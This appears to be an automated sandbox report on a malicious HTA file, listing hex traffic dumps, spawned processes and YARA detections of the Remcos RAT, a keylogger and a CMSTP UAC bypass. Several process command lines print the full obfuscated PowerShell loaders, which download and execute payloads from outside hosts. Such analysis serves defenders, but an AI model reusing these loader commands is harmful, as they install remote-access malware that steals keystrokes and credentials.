                                                                                                          2024-11-20 16:18:23 UTC8192INData Raw: 96 61 55 f1 aa fa e7 2f 87 b4 70 69 75 b3 34 91 c8 8b 18 64 07 f0 f6 3f 21 57 66 f8 17 81 82 fa 79 74 f2 98 a5 55 dc bd 76 90 6b f2 ca 58 36 05 9f 7a c6 fe d5 7f d8 b5 71 49 a6 78 ff 00 7a a4 3a b2 d5 95 24 5f f6 f7 eb 98 71 78 ac 61 4d a3 2b 8f c4 07 f4 c0 da 5f 0c d6 16 8c 08 f6 87 1b 95 98 8a ae dd 31 f3 f6 69 59 43 99 cf 99 7d 42 8d a3 df 83 d7 07 e1 da 77 d4 e9 5f 53 2e 9d 67 59 11 4a 9d f7 b4 57 37 ec 40 24 fd 31 99 3c 5f 4f e0 9a 78 e0 d6 c8 5b 50 88 14 a2 7a 88 eb cb 0f e1 1d 39 c0 4a 7f 08 5d 1b 34 93 ce 86 28 dc 29 00 10 5b 8b ae 7d fe 18 b6 9b c3 9f 5e 9a 9d 4a 6d 8b 4e 84 aa 96 70 3e 9c 8e 78 cb 45 a5 d7 f8 ba ae a4 c2 eb 1a 90 11 59 7c bd ca 6c fa 41 e4 8f 8e 69 3f 86 cc 9e 01 26 95 c8 89 49 67 17 27 e1 02 8e da ae 7a 60 79 ef 1d d0 68 b4 40
                                                                                                          Data Ascii: aU/piu4d?!WfytUvkX6zqIxz:$_qxaM+_1iYC}Bw_S.gYJW7@$1<_Ox[Pz9J]4()[}^JmNp>xEY|lAi?&Ig'z`yh@
                                                                                                          2024-11-20 16:18:23 UTC8192INData Raw: 43 0b 61 59 98 da 15 15 fb c0 38 e6 f1 8d 26 91 11 8b b3 9a fe 1f 63 80 74 64 91 37 2a 31 53 d8 e2 ba c6 52 9b 08 b6 3d 3d 58 cc 69 be 06 f2 de 81 04 0f cf 11 8b 46 fe 6d 93 5b 79 2d ef 81 a5 f6 71 1a 1f 1f d1 2c 8b e9 3b bf f2 b6 7b 0d 7a c2 61 91 19 f6 a1 16 c5 78 bc f2 fe 19 a9 8e 0f 12 86 66 f5 05 0c 47 d5 48 fe b8 ef 89 78 82 6a 0e c8 d7 68 61 ef d7 03 2e 17 d6 24 ad 1e 92 56 10 5d ed eb 79 bb a4 90 e9 e0 65 d4 10 c4 7a ac 62 30 4f a7 d2 45 60 1d c4 75 cb 9d 6c 5a 85 01 68 0e 87 8e 4e 06 79 95 df ed 67 9d 1a f4 e0 9f f8 30 7e 2d 3b 3e aa 75 2d 41 a0 5b 00 5d d3 dd 65 d6 45 4f b5 22 98 14 ab 3f f2 11 fd 71 7f 16 dc 75 92 b0 1b 6e 1b 00 71 63 76 06 87 8c 05 fb 94 70 84 11 c4 b2 52 92 a7 9f 4b 61 b4 33 28 f0 b8 5a 45 5a 54 5a bf 82 8c 17 8b cb 14 9a 2d
                                                                                                          Data Ascii: CaY8&ctd7*1SR==XiFm[y-q,;{zaxfGHxjha.$V]yezb0OE`ulZhNyg0~-;>u-A[]eEO"?qunqcvpRKa3(ZEZTZ-
                                                                                                          2024-11-20 16:18:23 UTC8192INData Raw: 19 af a4 d1 ea 16 49 b5 12 6a 44 ac c4 b8 8c 9b 51 c9 ae 48 be d8 07 99 03 c5 2c 2c 68 32 b2 80 bd 79 07 90 6b ae 79 33 1c 53 b2 c8 4c 8a 1b cc de 18 ee 62 55 77 11 74 3a dd 7d 33 77 53 17 8c 3c 12 39 9b 4c bb 48 65 11 b1 05 76 8e 40 f4 f5 26 b3 cb 34 f3 12 0b 3b 5a b9 63 b8 72 59 b8 63 fa 60 13 50 90 23 40 c8 1f 64 8b b8 ef a1 43 73 0a e9 f0 c7 a0 4d 34 9a a8 24 57 68 43 cc c5 d8 90 ca 08 a2 a0 71 fe 6a cc b9 67 69 84 4b 56 51 4a dd f5 f5 16 fc b9 c3 27 88 49 1e 96 18 10 22 94 76 70 db 41 3c 80 39 e3 e1 81 ec 25 89 51 88 25 9a c5 9e 7e 3f 0e d8 34 28 cf b1 08 06 ae 8e 60 cf a4 f1 2d 44 c7 51 26 a2 17 62 80 1e eb 5e d5 55 91 1e 87 5e ae 5a 3d 6c 6a d5 43 6c 8c bc 7c 28 60 7a 38 f4 a1 98 ab 50 e0 ff 00 2c 34 2a 11 42 ec b2 78 bc f3 32 41 e2 ea ca 0e b9 89
                                                                                                          Data Ascii: IjDQH,,h2yky3SLbUwt:}3wS<9LHev@&4;ZcrYc`P#@dCsM4$WhCqjgiKVQJ'I"vpA<9%Q%~?4(`-DQ&b^U^Z=ljCl|(`z8P,4*Bx2A
                                                                                                          2024-11-20 16:18:23 UTC8192INData Raw: 54 55 fa 81 37 96 d4 eb 24 fb c1 78 55 49 3a 76 91 9a 39 03 2e d1 63 93 b6 cf 4f 7c 1a 78 8c 8e 93 07 11 b4 b6 82 30 a4 21 90 30 a0 28 f7 e9 80 6f 1b d4 79 30 ed 54 57 f3 55 94 d8 ed 5d 6e fd f3 e7 9e 35 2b a0 11 59 a2 4f 4e fd 33 e8 5e 27 a6 33 69 c1 44 11 88 a3 67 63 cd 80 aa 68 7b 77 39 f3 8f 15 7f 32 73 62 88 ed f9 60 0f 4b aa 68 b4 b2 69 e4 41 24 4e 37 15 2c 46 d3 c1 bb 1f 2c e8 f5 12 69 22 91 12 32 93 b7 57 37 61 6a f8 07 a6 2a 80 b1 f5 38 8f 8e 2e e8 fe 58 de aa 36 32 09 02 12 bb 23 1b d8 1a bd 8b c7 23 01 ad 0e bd 34 7a 59 10 ab 19 0b 31 0e 2a 88 2b 54 7b f5 e7 15 82 59 20 25 e3 62 ac c2 8d 7b 5d e5 5f 4d 22 2a 99 11 95 5b d4 a4 ad 6e cb 32 88 c2 72 ad b8 5d 2f ce bf a6 01 d2 67 5d 5c 33 4c ec fb 1d 5b fe 10 7a 64 eb e6 4d 56 aa 49 93 76 d6 0a 40
                                                                                                          Data Ascii: TU7$xUI:v9.cO|x0!0(oy0TWU]n5+YON3^'3iDgch{w92sb`KhiA$N7,F,i"2W7aj*8.X62##4zY1*+T{Y %b{]_M"*[n2r]/g]\3L[zdMVIv@
                                                                                                          2024-11-20 16:18:23 UTC8192INData Raw: 8a 28 34 df 1a c0 45 e1 b7 02 c9 07 b9 c3 1f 0f 55 50 c5 e8 9e 98 63 a6 90 96 21 49 0b f8 98 0e 07 d7 2a 60 63 c9 fa 60 5f c3 34 4c 35 8a e4 f0 2f 68 f7 e0 e6 d1 de aa ca 52 ef a1 f6 c5 bc 31 37 6b 34 b6 3f c4 2f fe 1c df 68 d2 e8 d1 c0 c5 8b 4e d4 c5 c5 83 db 10 13 3b 4e ea 84 2a a9 f6 eb 9e 8d c0 5b 00 0e 73 3d b4 a9 6c c1 28 9e b8 1e 76 75 0d e2 e5 b6 02 09 5a 07 e4 32 ba dd 2e c9 03 06 e5 95 8f ab b5 01 8e 6a 60 d9 e2 d4 05 fe 1f e4 32 de 21 18 06 2d e2 ed 5a 8f c6 b8 c0 46 70 cd e1 f1 a2 90 17 68 35 c7 aa ab af e7 8c 78 06 9d 5d e5 76 65 34 bb 76 b7 43 95 78 83 78 7b 12 a3 d2 c0 29 06 b9 a5 07 fa e1 7c 28 c3 19 65 76 2b 29 61 b6 81 37 7c 7f 5c 04 bc 41 25 87 5d 16 f4 8c 32 a8 2a b1 72 28 31 f7 cd 3d 64 03 69 76 92 71 bb d3 b4 30 0a 38 ef c6 27 e2 ab
                                                                                                          Data Ascii: (4EUPc!I*`c`_4L5/hR17k4?/hN;N*[s=l(vuZ2.j`2!-ZFph5x]ve4vCxx{)|(ev+)a7|\A%]2*r(1=divq08'
                                                                                                          2024-11-20 16:18:23 UTC8192INData Raw: a8 5d c5 95 94 5f 03 76 e0 4f f2 ff 00 87 3a 10 95 24 93 ac 85 59 58 23 21 00 06 1c 8e 3d ac 8f cf 15 77 2e cc cc 6c 93 66 85 5e 05 c6 dd a4 ee 50 2d 7d fd 8e 18 6a 21 54 e0 7f 19 3b 41 20 d5 11 d7 eb 89 76 eb 91 58 0d 3c 81 82 aa 05 04 6e e9 7d 08 f8 e1 a0 96 34 68 dc 95 b0 56 e8 10 78 20 f2 3a 11 43 b7 38 87 d7 0b 02 87 99 11 88 00 b0 04 93 54 30 1d d4 4f 13 ce cc 0a 12 5c 37 01 8d ed be 0d fb fc 30 0d 2a f9 d1 48 68 81 b4 ba 8b ea 38 3f 98 17 f5 c0 48 8c 8c ca c2 98 1a 3c df c7 05 58 1a 49 3c 40 20 b5 4a 0e 4e c0 c7 aa d0 06 fb df d3 20 48 8f 13 2f 99 c2 c5 44 80 7a 97 07 8b e7 11 50 b7 c9 20 51 e9 90 7a 57 eb 80 db ca ad 1b ad d9 2c 9d 01 e4 05 20 9f ce b0 53 32 bd b2 b5 92 ec 7e 9c 56 2f 59 74 0c cc 15 41 26 fa 60 3b 29 54 12 13 20 2c d0 a2 80 a0 fb
                                                                                                          Data Ascii: ]_vO:$YX#!=w.lf^P-}j!T;A vX<n}4hVx :C8T0O\70*Hh8?H<XI<@ JN H/DzP QzW, S2~V/YtA&`;)T ,


                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:11:18:02
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:mshta.exe "C:\Users\user\Desktop\seethebestthignswhichgivingbestopportunities.hta"
                                                                                                          Imagebase:0x630000
                                                                                                          File size:13'312 bytes
                                                                                                          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:1
                                                                                                          Start time:11:18:04
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                                                                                                          Imagebase:0x320000
                                                                                                          File size:433'152 bytes
                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:2
                                                                                                          Start time:11:18:04
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff75da10000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:3
                                                                                                          Start time:11:18:04
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
                                                                                                          Imagebase:0x320000
                                                                                                          File size:433'152 bytes
                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:10
                                                                                                          Start time:11:18:10
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline"
                                                                                                          Imagebase:0xdf0000
                                                                                                          File size:2'141'552 bytes
                                                                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:11
                                                                                                          Start time:11:18:11
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES883E.tmp" "c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP"
                                                                                                          Imagebase:0xc60000
                                                                                                          File size:46'832 bytes
                                                                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:13
                                                                                                          Start time:11:18:17
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                                                                                                          Imagebase:0x320000
                                                                                                          File size:147'456 bytes
                                                                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:14
                                                                                                          Start time:11:18:18
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                          Imagebase:0x320000
                                                                                                          File size:433'152 bytes
                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:15
                                                                                                          Start time:11:18:18
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff75da10000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          General

                                                                                                          Target ID:16
                                                                                                          Start time:11:18:18
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                                                                                                          Imagebase:0x320000
                                                                                                          File size:433'152 bytes
                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:18
                                                                                                          Start time:12:53:16
                                                                                                          Start date:20/11/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                          Imagebase:0x590000
                                                                                                          File size:108'664 bytes
                                                                                                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.3693144012.00000000027BE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.3689257366.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Has exited:false

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Executed Functions

